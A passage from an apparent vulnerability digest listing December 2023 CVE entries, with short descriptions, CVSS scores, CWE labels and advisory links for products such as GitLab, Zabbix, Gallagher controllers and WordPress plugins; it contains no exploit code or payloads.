https://bugzilla.redhat.com/show_bug.cgi?id=2249523 | source : secalert@redhat.com

Vulnerability : CWE-122


Source : huntr.dev

Vulnerability ID : CVE-2023-6778

First published on : 18-12-2023 15:15:10
Last modified on : 18-12-2023 17:24:19

Description :
Cross-site Scripting (XSS) - Stored in GitHub repository allegroai/clearml-server prior to 1.13.0. This vulnerability affects the ClearML Open Source Server which is not designed to be used as a publicly available service. Security recommendations stress it should be placed behind a company firewall or VPN. This vulnerability only affects users within the same organisation (I.e when a malicious party already has access to the internal network and to a user's ClearML login credentials).

CVE ID : CVE-2023-6778
Source : security@huntr.dev
CVSS Score : 7.5

References :
https://github.com/allegroai/clearml-server/commit/4684fd5b74af582c894b67a0a06e865c948b763a | source : security@huntr.dev
https://huntr.com/bounties/5f3fffac-0358-48e6-a500-81bac13e0e2b | source : security@huntr.dev

Vulnerability : CWE-79


Source : gallagher.com

Vulnerability ID : CVE-2023-24590

First published on : 18-12-2023 22:15:08
Last modified on : 18-12-2023 22:15:08

Description :
A format string issue in the Controller 6000's optional diagnostic web interface can be used to write/read from memory, and in some instances crash the Controller 6000 leading to a Denial of Service. This issue affects: Gallagher Controller 6000 8.60 prior to vCR8.60.231116a (distributed in 8.60.2550 (MR7)), all versions of 8.50 and prior.

CVE ID : CVE-2023-24590
Source : disclosures@gallagher.com
CVSS Score : 7.5

References :
https://security.gallagher.com/Security-Advisories/CVE-2023-24590 | source : disclosures@gallagher.com

Vulnerability : CWE-134


Source : gitlab.com

Vulnerability ID : CVE-2023-6680

First published on : 15-12-2023 16:15:46
Last modified on : 15-12-2023 16:53:06

Description :
An improper certificate validation issue in Smartcard authentication in GitLab EE affecting all versions from 11.6 prior to 16.4.4, 16.5 prior to 16.5.4, and 16.6 prior to 16.6.2 allows an attacker to authenticate as another user given their public key if they use Smartcard authentication. Smartcard authentication is an experimental feature and has to be manually enabled by an administrator.

CVE ID : CVE-2023-6680
Source : cve@gitlab.com
CVSS Score : 7.4

References :
https://gitlab.com/gitlab-org/gitlab/-/issues/421607 | source : cve@gitlab.com

Vulnerability : CWE-295


Source : vuldb.com

Vulnerability ID : CVE-2023-6848

First published on : 16-12-2023 07:15:44
Last modified on : 18-12-2023 14:05:28

Description :
A vulnerability was found in kalcaddle kodbox up to 1.48. It has been declared as critical. Affected by this vulnerability is the function check of the file plugins/officeViewer/controller/libreOffice/index.class.php. The manipulation of the argument soffice leads to command injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.48.04 is able to address this issue. The identifier of the patch is 63a4d5708d210f119c24afd941d01a943e25334c. It is recommended to upgrade the affected component. The identifier VDB-248209 was assigned to this vulnerability.

CVE ID : CVE-2023-6848
Source : cna@vuldb.com
CVSS Score : 7.3

References :
https://github.com/kalcaddle/kodbox/commit/63a4d5708d210f119c24afd941d01a943e25334c | source : cna@vuldb.com
https://github.com/kalcaddle/kodbox/releases/tag/1.48.04 | source : cna@vuldb.com
https://note.zhaoj.in/share/pf838kAzQyTQ | source : cna@vuldb.com
https://vuldb.com/?ctiid.248209 | source : cna@vuldb.com
https://vuldb.com/?id.248209 | source : cna@vuldb.com

Vulnerability : CWE-77


Vulnerability ID : CVE-2023-6849

First published on : 16-12-2023 08:15:06
Last modified on : 18-12-2023 14:05:28

Description :
A vulnerability was found in kalcaddle kodbox up to 1.48. It has been rated as critical. Affected by this issue is the function cover of the file plugins/fileThumb/app.php. The manipulation of the argument path leads to server-side request forgery. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.48.04 is able to address this issue. The patch is identified as 63a4d5708d210f119c24afd941d01a943e25334c. It is recommended to upgrade the affected component. VDB-248210 is the identifier assigned to this vulnerability.

CVE ID : CVE-2023-6849
Source : cna@vuldb.com
CVSS Score : 7.3

References :
https://github.com/kalcaddle/kodbox/commit/63a4d5708d210f119c24afd941d01a943e25334c | source : cna@vuldb.com
https://github.com/kalcaddle/kodbox/releases/tag/1.48.04 | source : cna@vuldb.com
https://note.zhaoj.in/share/jSsPAWT1pKsq | source : cna@vuldb.com
https://vuldb.com/?ctiid.248210 | source : cna@vuldb.com
https://vuldb.com/?id.248210 | source : cna@vuldb.com

Vulnerability : CWE-918


Vulnerability ID : CVE-2023-6901

First published on : 17-12-2023 14:15:37
Last modified on : 18-12-2023 14:05:22

Description :
A vulnerability, which was classified as critical, was found in codelyfe Stupid Simple CMS up to 1.2.3. This affects an unknown part of the file /terminal/handle-command.php of the component HTTP POST Request Handler. The manipulation of the argument command with the input whoami leads to os command injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-248259.

CVE ID : CVE-2023-6901
Source : cna@vuldb.com
CVSS Score : 7.3

References :
https://github.com/g1an123/POC/blob/main/README.md | source : cna@vuldb.com
https://vuldb.com/?ctiid.248259 | source : cna@vuldb.com
https://vuldb.com/?id.248259 | source : cna@vuldb.com

Vulnerability : CWE-78


Vulnerability ID : CVE-2023-6903

First published on : 17-12-2023 23:15:44
Last modified on : 18-12-2023 14:05:22

Description :
A vulnerability classified as critical has been found in Netentsec NS-ASG Application Security Gateway 6.3.1. This affects an unknown part of the file /admin/singlelogin.php?submit=1. The manipulation of the argument loginId leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-248265 was assigned to this vulnerability.

CVE ID : CVE-2023-6903
Source : cna@vuldb.com
CVSS Score : 7.3

References :
https://github.com/willchen0011/cve/blob/main/NS-ASG-sql.md | source : cna@vuldb.com
https://vuldb.com/?ctiid.248265 | source : cna@vuldb.com
https://vuldb.com/?id.248265 | source : cna@vuldb.com

Vulnerability : CWE-89


Source : patchstack.com

Vulnerability ID : CVE-2023-49159

First published on : 15-12-2023 16:15:43
Last modified on : 15-12-2023 16:53:06

Description :
Server-Side Request Forgery (SSRF) vulnerability in Elegant Digital Solutions CommentLuv.This issue affects CommentLuv: from n/a through 3.0.4.

CVE ID : CVE-2023-49159
Source : audit@patchstack.com
CVSS Score : 7.2

References :
https://patchstack.com/database/vulnerability/commentluv/wordpress-commentluv-plugin-3-0-4-server-side-request-forgery-ssrf-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-918


Vulnerability ID : CVE-2023-49170

First published on : 15-12-2023 15:15:07
Last modified on : 15-12-2023 15:26:42

Description :
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in captainform Forms by CaptainForm – Form Builder for WordPress allows Reflected XSS.This issue affects Forms by CaptainForm – Form Builder for WordPress: from n/a through 2.5.3.

CVE ID : CVE-2023-49170
Source : audit@patchstack.com
CVSS Score : 7.1

References :
https://patchstack.com/database/vulnerability/captainform/wordpress-forms-by-captainform-form-builder-for-wordpress-plugin-2-5-3-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-49176

First published on : 15-12-2023 15:15:08
Last modified on : 15-12-2023 15:26:42

Description :
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in CodeRevolution WP Pocket URLs allows Reflected XSS.This issue affects WP Pocket URLs: from n/a through 1.0.2.

CVE ID : CVE-2023-49176
Source : audit@patchstack.com
CVSS Score : 7.1

References :
https://patchstack.com/database/vulnerability/wp-pocket-urls/wordpress-wp-pocket-urls-plugin-1-0-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-49177

First published on : 15-12-2023 15:15:08
Last modified on : 15-12-2023 15:26:42

Description :
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Gilles Dumas which template file allows Reflected XSS.This issue affects which template file: from n/a through 4.9.0.

CVE ID : CVE-2023-49177
Source : audit@patchstack.com
CVSS Score : 7.1

References :
https://patchstack.com/database/vulnerability/which-template-file/wordpress-which-template-file-plugin-4-9-0-cross-site-scripting-xss-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-49178

First published on : 15-12-2023 15:15:08
Last modified on : 15-12-2023 15:26:42

Description :
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Mr. Hdwplayer HDW Player Plugin (Video Player & Video Gallery) allows Reflected XSS.This issue affects HDW Player Plugin (Video Player & Video Gallery): from n/a through 5.0.

CVE ID : CVE-2023-49178
Source : audit@patchstack.com
CVSS Score : 7.1

References :
https://patchstack.com/database/vulnerability/hdw-player-video-player-video-gallery/wordpress-hdw-player-plugin-video-player-video-gallery-plugin-5-0-cross-site-scripting-xss-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-49182

First published on : 15-12-2023 15:15:09
Last modified on : 15-12-2023 15:26:42

Description :
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Fabio Marzocca List all posts by Authors, nested Categories and Titles allows Reflected XSS.This issue affects List all posts by Authors, nested Categories and Titles: from n/a through 2.7.10.

CVE ID : CVE-2023-49182
Source : audit@patchstack.com
CVSS Score : 7.1

References :
https://patchstack.com/database/vulnerability/list-all-posts-by-authors-nested-categories-and-titles/wordpress-list-all-posts-by-authors-nested-categories-and-title-plugin-2-7-10-cross-site-scripting-xss-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-49183

First published on : 15-12-2023 15:15:09
Last modified on : 15-12-2023 15:26:42

Description :
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in NextScripts NextScripts: Social Networks Auto-Poster allows Reflected XSS.This issue affects NextScripts: Social Networks Auto-Poster: from n/a through 4.4.2.

CVE ID : CVE-2023-49183
Source : audit@patchstack.com
CVSS Score : 7.1

References :
https://patchstack.com/database/vulnerability/social-networks-auto-poster-facebook-twitter-g/wordpress-nextscripts-social-networks-auto-poster-plugin-4-4-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-49185

First published on : 15-12-2023 15:15:10
Last modified on : 15-12-2023 15:26:42

Description :
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Doofinder Doofinder WP & WooCommerce Search allows Reflected XSS.This issue affects Doofinder WP & WooCommerce Search: from n/a through 2.1.7.

CVE ID : CVE-2023-49185
Source : audit@patchstack.com
CVSS Score : 7.1

References :
https://patchstack.com/database/vulnerability/doofinder-for-woocommerce/wordpress-doofinder-wp-woocommerce-search-plugin-2-0-33-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-49187

First published on : 15-12-2023 15:15:10
Last modified on : 15-12-2023 15:26:42

Description :
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Spoonthemes Adifier - Classified Ads WordPress Theme allows Reflected XSS.This issue affects Adifier - Classified Ads WordPress Theme: from n/a before 3.1.4.

CVE ID : CVE-2023-49187
Source : audit@patchstack.com
CVSS Score : 7.1

References :
https://patchstack.com/database/vulnerability/adifier/wordpress-adifier-classified-ads-wordpress-theme-theme-3-9-3-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-79


Source : hpe.com

Vulnerability ID : CVE-2023-50271

First published on : 17-12-2023 15:15:07
Last modified on : 18-12-2023 14:05:22

Description :
A potential security vulnerability has been identified with HP-UX System Management Homepage (SMH). This vulnerability could be exploited locally or remotely to disclose information.

CVE ID : CVE-2023-50271
Source : security-alert@hpe.com
CVSS Score : 7.2

References :
https://support.hpe.com/hpesc/public/docDisplay?docLocale=en_US&docId=hpesbux04551en_us | source : security-alert@hpe.com

Vulnerability : CWE-200


(308) MEDIUM VULNERABILITIES [4.0, 6.9]

Source : a87f365f-9d39-4848-9b3a-58c7cae69cab

Vulnerability ID : CVE-2023-33221

First published on : 15-12-2023 12:15:43
Last modified on : 15-12-2023 13:41:51

Description :
When reading DesFire keys, the function that reads the card isn't properly checking the boundaries when copying internally the data received. This allows a heap based buffer overflow that could lead to a potential Remote Code Execution on the targeted device. This is especially problematic if you use Default DESFire key.

CVE ID : CVE-2023-33221
Source : a87f365f-9d39-4848-9b3a-58c7cae69cab
CVSS Score : 6.8

References :
https://www.idemia.com/wp-content/uploads/2023/11/Security-Advisory-SA-2023-05-2.pdf | source : a87f365f-9d39-4848-9b3a-58c7cae69cab

Vulnerability : CWE-122


Vulnerability ID : CVE-2023-33222

First published on : 15-12-2023 12:15:44
Last modified on : 15-12-2023 13:41:51

Description :
When handling contactless cards, usage of a specific function to get additional information from the card which doesn't check the boundary on the data received while reading. This allows a stack-based buffer overflow that could lead to a potential Remote Code Execution on the targeted device

CVE ID : CVE-2023-33222
Source : a87f365f-9d39-4848-9b3a-58c7cae69cab
CVSS Score : 6.8

References :
https://www.idemia.com/wp-content/uploads/2023/11/Security-Advisory-SA-2023-05-2.pdf | source : a87f365f-9d39-4848-9b3a-58c7cae69cab

Vulnerability : CWE-121


Source : zabbix.com

Vulnerability ID : CVE-2023-32727

First published on : 18-12-2023 10:15:06
Last modified on : 18-12-2023 14:05:17

Description :
An attacker who has the privilege to configure Zabbix items can use function icmpping() with additional malicious command inside it to execute arbitrary code on the current Zabbix server.

CVE ID : CVE-2023-32727
Source : security@zabbix.com
CVSS Score : 6.8

References :
https://support.zabbix.com/browse/ZBX-23857 | source : security@zabbix.com

Vulnerability : CWE-20


Vulnerability ID : CVE-2023-32728

First published on : 18-12-2023 10:15:07
Last modified on : 18-12-2023 14:05:17

Description :
The Zabbix Agent 2 item key smart.disk.get does not sanitize its parameters before passing them to a shell command resulting possible vulnerability for remote code execution.

CVE ID : CVE-2023-32728
Source : security@zabbix.com
CVSS Score : 4.6

References :
https://support.zabbix.com/browse/ZBX-23858 | source : security@zabbix.com

Vulnerability : CWE-20


Source : redhat.com

Vulnerability ID : CVE-2023-5056

First published on : 18-12-2023 14:15:10
Last modified on : 18-12-2023 15:04:28

Description :
A flaw was found in the Skupper operator, which may permit a certain configuration to create a service account that would allow an authenticated attacker in the adjacent cluster to view deployments in all namespaces in the cluster. This issue permits unauthorized viewing of information outside of the user's purview.

CVE ID : CVE-2023-5056
Source : secalert@redhat.com
CVSS Score : 6.8

References :
https://access.redhat.com/errata/RHSA-2023:6219 | source : secalert@redhat.com
https://access.redhat.com/security/cve/CVE-2023-5056 | source : secalert@redhat.com
https://bugzilla.redhat.com/show_bug.cgi?id=2239517 | source : secalert@redhat.com

Vulnerability : CWE-862


Vulnerability ID : CVE-2023-3628

First published on : 18-12-2023 14:15:08
Last modified on : 18-12-2023 15:04:28

Description :
A flaw was found in Infinispan's REST. Bulk read endpoints do not properly evaluate user permissions for the operation. This issue could allow an authenticated user to access information outside of their intended permissions.

CVE ID : CVE-2023-3628
Source : secalert@redhat.com
CVSS Score : 6.5

References :
https://access.redhat.com/errata/RHSA-2023:5396 | source : secalert@redhat.com
https://access.redhat.com/security/cve/CVE-2023-3628 | source : secalert@redhat.com
https://bugzilla.redhat.com/show_bug.cgi?id=2217924 | source : secalert@redhat.com

Vulnerability : CWE-304


Vulnerability ID : CVE-2023-5115

First published on : 18-12-2023 14:15:10
Last modified on : 18-12-2023 15:04:28

Description :
An absolute path traversal attack exists in the Ansible automation platform. This flaw allows an attacker to craft a malicious Ansible role and make the victim execute the role. A symlink can be used to overwrite a file outside of the extraction path.

CVE ID : CVE-2023-5115
Source : secalert@redhat.com
CVSS Score : 6.3

References :
https://access.redhat.com/errata/RHSA-2023:5701 | source : secalert@redhat.com
https://access.redhat.com/errata/RHSA-2023:5758 | source : secalert@redhat.com
https://access.redhat.com/security/cve/CVE-2023-5115 | source : secalert@redhat.com
https://bugzilla.redhat.com/show_bug.cgi?id=2233810 | source : secalert@redhat.com


Vulnerability ID : CVE-2023-4320

First published on : 18-12-2023 14:15:09
Last modified on : 18-12-2023 15:04:28

Description :
An arithmetic overflow flaw was found in Satellite when creating a new personal access token. This flaw allows an attacker who uses this arithmetic overflow to create personal access tokens that are valid indefinitely, resulting in damage to the system's integrity.

CVE ID : CVE-2023-4320
Source : secalert@redhat.com
CVSS Score : 6.0

References :
https://access.redhat.com/security/cve/CVE-2023-4320 | source : secalert@redhat.com
https://bugzilla.redhat.com/show_bug.cgi?id=2231814 | source : secalert@redhat.com

Vulnerability : CWE-613


Vulnerability ID : CVE-2023-6228

First published on : 18-12-2023 14:15:11
Last modified on : 18-12-2023 15:04:28

Description :
An issue was found in the tiffcp utility distributed by the libtiff package where a crafted TIFF file on processing may cause a heap-based buffer overflow leads to an application crash.

CVE ID : CVE-2023-6228
Source : secalert@redhat.com
CVSS Score : 5.5

References :
https://access.redhat.com/security/cve/CVE-2023-6228 | source : secalert@redhat.com
https://bugzilla.redhat.com/show_bug.cgi?id=2240995 | source : secalert@redhat.com

Vulnerability : CWE-400


Vulnerability ID : CVE-2023-5236

First published on : 18-12-2023 14:15:10
Last modified on : 18-12-2023 15:04:28

Description :
A flaw was found in Infinispan, which does not detect circular object references when unmarshalling. An authenticated attacker with sufficient permissions could insert a maliciously constructed object into the cache and use it to cause out of memory errors and achieve a denial of service.

CVE ID : CVE-2023-5236
Source : secalert@redhat.com
CVSS Score : 4.4

References :
https://access.redhat.com/errata/RHSA-2023:5396 | source : secalert@redhat.com
https://access.redhat.com/security/cve/CVE-2023-5236 | source : secalert@redhat.com
https://bugzilla.redhat.com/show_bug.cgi?id=2240999 | source : secalert@redhat.com

Vulnerability : CWE-1047


Vulnerability ID : CVE-2023-3629

First published on : 18-12-2023 14:15:08
Last modified on : 18-12-2023 15:04:28

Description :
A flaw was found in Infinispan's REST, Cache retrieval endpoints do not properly evaluate the necessary admin permissions for the operation. This issue could allow an authenticated user to access information outside of their intended permissions.

CVE ID : CVE-2023-3629
Source : secalert@redhat.com
CVSS Score : 4.3

References :
https://access.redhat.com/errata/RHSA-2023:5396 | source : secalert@redhat.com
https://access.redhat.com/security/cve/CVE-2023-3629 | source : secalert@redhat.com
https://bugzilla.redhat.com/show_bug.cgi?id=2217926 | source : secalert@redhat.com

Vulnerability : CWE-304


Source : gallagher.com

Vulnerability ID : CVE-2023-6355

First published on : 18-12-2023 22:15:10
Last modified on : 18-12-2023 22:15:10

Description :
Incorrect selection of fuse values in the Controller 7000 platform allows an attacker to bypass some protection mechanisms to enable local debug. This issue affects: Gallagher Controller 7000 9.00 prior to vCR9.00.231204b (distributed in 9.00.1507 (MR1)), 8.90 prior to vCR8.90.231204a (distributed in 8.90.1620 (MR2)), 8.80 prior to vCR8.80.231204a (distributed in 8.80.1369 (MR3)), 8.70 prior to vCR8.70.231204a (distributed in 8.70.2375 (MR5)).

CVE ID : CVE-2023-6355
Source : disclosures@gallagher.com
CVSS Score : 6.8

References :
https://security.gallagher.com/Security-Advisories/CVE-2023-6355 | source : disclosures@gallagher.com

Vulnerability : CWE-1253


Vulnerability ID : CVE-2023-46686

First published on : 18-12-2023 22:15:08
Last modified on : 18-12-2023 22:15:08

Description :
A reliance on untrusted inputs in a security decision could be exploited by a privileged user to configure the Gallagher Command Centre Diagnostics Service to use less secure communication protocols. This issue affects: Gallagher Diagnostics Service prior to v1.3.0 (distributed in 9.00.1507(MR1)).

CVE ID : CVE-2023-46686
Source : disclosures@gallagher.com
CVSS Score : 5.5

References :
https://security.gallagher.com/Security-Advisories/CVE-2023-46686 | source : disclosures@gallagher.com

Vulnerability : CWE-807


Vulnerability ID : CVE-2023-23570

First published on : 18-12-2023 22:15:08
Last modified on : 18-12-2023 22:15:08

Description :
Client-Side enforcement of Server-Side security for the Command Centre server could be bypassed and lead to invalid configuration with undefined behavior. This issue affects: Gallagher Command Centre 8.90 prior to vEL8.90.1620 (MR2), all versions of 8.80 and prior.

CVE ID : CVE-2023-23570
Source : disclosures@gallagher.com
CVSS Score : 5.4

References :
https://security.gallagher.com/Security-Advisories/CVE-2023-23570 | source : disclosures@gallagher.com

Vulnerability : CWE-602


Vulnerability ID : CVE-2023-23576

First published on : 18-12-2023 22:15:08
Last modified on : 18-12-2023 22:15:08

Description :
Incorrect behavior order in the Command Centre Server could allow privileged users to gain physical access to the site for longer than intended after a network outage when competencies are used in the access decision. This issue affects: Gallagher Command Centre: 8.90 prior to vEL8.90.1620 (MR2), 8.80 prior to vEL8.80.1369 (MR3), 8.70 prior to vEL8.70.2375 (MR5), 8.60 prior to vEL8.60.2550 (MR7), all versions of 8.50 and prior.

CVE ID : CVE-2023-23576
Source : disclosures@gallagher.com
CVSS Score : 4.3

References :
https://security.gallagher.com/Security-Advisories/CVE-2023-23576 | source : disclosures@gallagher.com

Vulnerability : CWE-696


Vulnerability ID : CVE-2023-23584

First published on : 18-12-2023 22:15:08
Last modified on : 18-12-2023 22:15:08

Description :
An observable response discrepancy in the Gallagher Command Centre RESTAPI allows an insufficiently-privileged user to infer the presence of items that would not otherwise be viewable. This issue affects: Gallagher Command Centre 8.70 prior to vEL8.70.1787 (MR2), 8.60 prior to vEL8.60.2039 (MR4), all version of 8.50 and prior.

CVE ID : CVE-2023-23584
Source : disclosures@gallagher.com
CVSS Score : 4.3

References :
https://security.gallagher.com/Security-Advisories/CVE-2023-23584 | source : disclosures@gallagher.com

Vulnerability : CWE-204


Source : huntr.dev

Vulnerability ID : CVE-2023-6889

First published on : 16-12-2023 09:15:07
Last modified on : 18-12-2023 14:05:28

Description :
Cross-site Scripting (XSS) - Stored in GitHub repository thorsten/phpmyfaq prior to 3.1.17.

CVE ID : CVE-2023-6889
Source : security@huntr.dev
CVSS Score : 6.7

References :
https://github.com/thorsten/phpmyfaq/commit/1037a8f012e0d9ec4bf4c8107972f6695e381392 | source : security@huntr.dev
https://huntr.com/bounties/52897778-fad7-4169-bf04-a68a0646df0c | source : security@huntr.dev

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-6890

First published on : 16-12-2023 09:15:07
Last modified on : 18-12-2023 14:05:28

Description :
Cross-site Scripting (XSS) - Stored in GitHub repository thorsten/phpmyfaq prior to 3.1.17.

CVE ID : CVE-2023-6890
Source : security@huntr.dev
CVSS Score : 6.7

References :
https://github.com/thorsten/phpmyfaq/commit/97d90ebbe11ebc6081bf49a2ba4b60f227cd1b43 | source : security@huntr.dev
https://huntr.com/bounties/2cf11678-8793-4fa1-b21a-f135564a105d | source : security@huntr.dev

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-6832

First published on : 15-12-2023 01:15:08
Last modified on : 15-12-2023 13:42:13

Description :
Business Logic Errors in GitHub repository microweber/microweber prior to 2.0.

CVE ID : CVE-2023-6832
Source : security@huntr.dev
CVSS Score : 6.0

References :
https://github.com/microweber/microweber/commit/890e9838aabbc799ebefcf6b20ba25e0fd6dbfee | source : security@huntr.dev
https://huntr.com/bounties/53105a20-f4b1-45ad-a734-0349de6d7376 | source : security@huntr.dev

Vulnerability : CWE-840


Source : cert.org.tw

Vulnerability ID : CVE-2023-48374

First published on : 15-12-2023 08:15:44
Last modified on : 15-12-2023 13:42:13

Description :
SmartStar Software CWS is a web-base integration platform, it has a vulnerability of using a hard-coded for a specific account with low privilege. An unauthenticated remote attacker can exploit this vulnerability to run partial processes and obtain partial information, but can't disrupt service or obtain sensitive information.

CVE ID : CVE-2023-48374
Source : twcert@cert.org.tw
CVSS Score : 6.5

References :
https://www.twcert.org.tw/tw/cp-132-7593-d3e5b-1.html | source : twcert@cert.org.tw

Vulnerability : CWE-798


Vulnerability ID : CVE-2023-48381

First published on : 15-12-2023 09:15:07
Last modified on : 15-12-2023 13:42:13

Description :
Softnext Mail SQR Expert is an email management platform, it has a Local File Inclusion (LFI) vulnerability in a special URL. An unauthenticated remote attacker can exploit this vulnerability to execute arbitrary PHP file with .asp file extension under specific system paths, to access and modify partial system information but does not affect service availability.

CVE ID : CVE-2023-48381
Source : twcert@cert.org.tw
CVSS Score : 6.5

References :
https://www.twcert.org.tw/tw/cp-132-7599-461d5-1.html | source : twcert@cert.org.tw

Vulnerability : CWE-22


Vulnerability ID : CVE-2023-48382

First published on : 15-12-2023 09:15:07
Last modified on : 15-12-2023 13:42:13

Description :
Softnext Mail SQR Expert is an email management platform, it has a Local File Inclusion (LFI) vulnerability in a mail deliver-related URL. An unauthenticated remote attacker can exploit this vulnerability to execute arbitrary PHP file with .asp file extension under specific system paths, to access and modify partial system information but does not affect service availability.

CVE ID : CVE-2023-48382
Source : twcert@cert.org.tw
CVSS Score : 6.5

References :
https://www.twcert.org.tw/tw/cp-132-7600-dd072-1.html | source : twcert@cert.org.tw

Vulnerability : CWE-22


Vulnerability ID : CVE-2023-48395

First published on : 15-12-2023 10:15:08
Last modified on : 15-12-2023 13:42:13

Description :
Kaifa Technology WebITR is an online attendance system, it has insufficient validation for user input within a special function. A remote attacker with regular user privilege can exploit this vulnerability to inject arbitrary SQL commands to read database.

CVE ID : CVE-2023-48395
Source : twcert@cert.org.tw
CVSS Score : 6.5

References :
https://www.twcert.org.tw/tw/cp-132-7625-a0b9c-1.html | source : twcert@cert.org.tw

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-48387

First published on : 15-12-2023 09:15:08
Last modified on : 15-12-2023 13:42:13

Description :
TAIWAN-CA(TWCA) JCICSecurityTool's Registry-related functions have insufficient filtering for special characters. An unauthenticated remote attacker can inject malicious script into a webpage to perform XSS (Stored Cross-Site Scripting) attack.

CVE ID : CVE-2023-48387
Source : twcert@cert.org.tw
CVSS Score : 6.1

References :
https://www.twcert.org.tw/tw/cp-132-7602-a47a2-1.html | source : twcert@cert.org.tw

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-48379

First published on : 15-12-2023 08:15:45
Last modified on : 15-12-2023 13:42:13

Description :
Softnext Mail SQR Expert is an email management platform, it has inadequate filtering for a specific URL parameter within a specific function. An unauthenticated remote attacker can perform Blind SSRF attack to discover internal network topology base on URL error response.

CVE ID : CVE-2023-48379
Source : twcert@cert.org.tw
CVSS Score : 5.3

References :
https://www.twcert.org.tw/tw/cp-132-7597-fff54-1.html | source : twcert@cert.org.tw

Vulnerability : CWE-918


Vulnerability ID : CVE-2023-48393

First published on : 15-12-2023 10:15:07
Last modified on : 15-12-2023 13:42:13

Description :
Kaifa Technology WebITR is an online attendance system. A remote attacker with regular user privilege can obtain partial sensitive system information from error message.

CVE ID : CVE-2023-48393
Source : twcert@cert.org.tw
CVSS Score : 4.3

References :
https://www.twcert.org.tw/tw/cp-132-7623-5660d-1.html | source : twcert@cert.org.tw

Vulnerability : CWE-209


Source : patchstack.com

Vulnerability ID : CVE-2023-48765

First published on : 15-12-2023 14:15:14
Last modified on : 15-12-2023 15:26:42

Description :
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Till Krüss Email Address Encoder allows Stored XSS.This issue affects Email Address Encoder: from n/a through 1.0.22.

CVE ID : CVE-2023-48765
Source : audit@patchstack.com
CVSS Score : 6.5

References :
https://patchstack.com/database/vulnerability/email-address-encoder/wordpress-email-address-encoder-plugin-1-0-22-cross-site-scripting-xss-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-49160

First published on : 15-12-2023 14:15:15
Last modified on : 15-12-2023 15:26:42

Description :
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in formzu Inc. Formzu WP allows Stored XSS.This issue affects Formzu WP: from n/a through 1.6.6.

CVE ID : CVE-2023-49160
Source : audit@patchstack.com
CVSS Score : 6.5

References :
https://patchstack.com/database/vulnerability/formzu-wp/wordpress-formzu-wp-plugin-1-6-6-cross-site-scripting-xss-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-49169

First published on : 15-12-2023 15:15:07
Last modified on : 15-12-2023 15:26:42

Description :
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in datafeedr.Com Ads by datafeedr.Com allows Stored XSS.This issue affects Ads by datafeedr.Com: from n/a through 1.2.0.

CVE ID : CVE-2023-49169
Source : audit@patchstack.com
CVSS Score : 6.5

References :
https://patchstack.com/database/vulnerability/ads-by-datafeedrcom/wordpress-ads-by-datafeedr-com-plugin-1-2-0-cross-site-scripting-xss-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-49179

First published on : 15-12-2023 15:15:09
Last modified on : 15-12-2023 15:26:42

Description :
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in N.O.U.S. Open Useful and Simple Event post allows Stored XSS.This issue affects Event post: from n/a through 5.8.6.

CVE ID : CVE-2023-49179
Source : audit@patchstack.com
CVSS Score : 6.5

References :
https://patchstack.com/database/vulnerability/event-post/wordpress-event-post-plugin-5-8-6-cross-site-scripting-xss-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-49823

First published on : 15-12-2023 16:15:45
Last modified on : 15-12-2023 16:53:06

Description :
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in BoldThemes Bold Page Builder allows Stored XSS.This issue affects Bold Page Builder: from n/a through 4.6.1.

CVE ID : CVE-2023-49823
Source : audit@patchstack.com
CVSS Score : 6.5

References :
https://patchstack.com/database/vulnerability/bold-page-builder/wordpress-bold-page-builder-plugin-4-6-1-cross-site-scripting-xss-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-49855

First published on : 18-12-2023 11:15:13
Last modified on : 18-12-2023 14:05:17

Description :
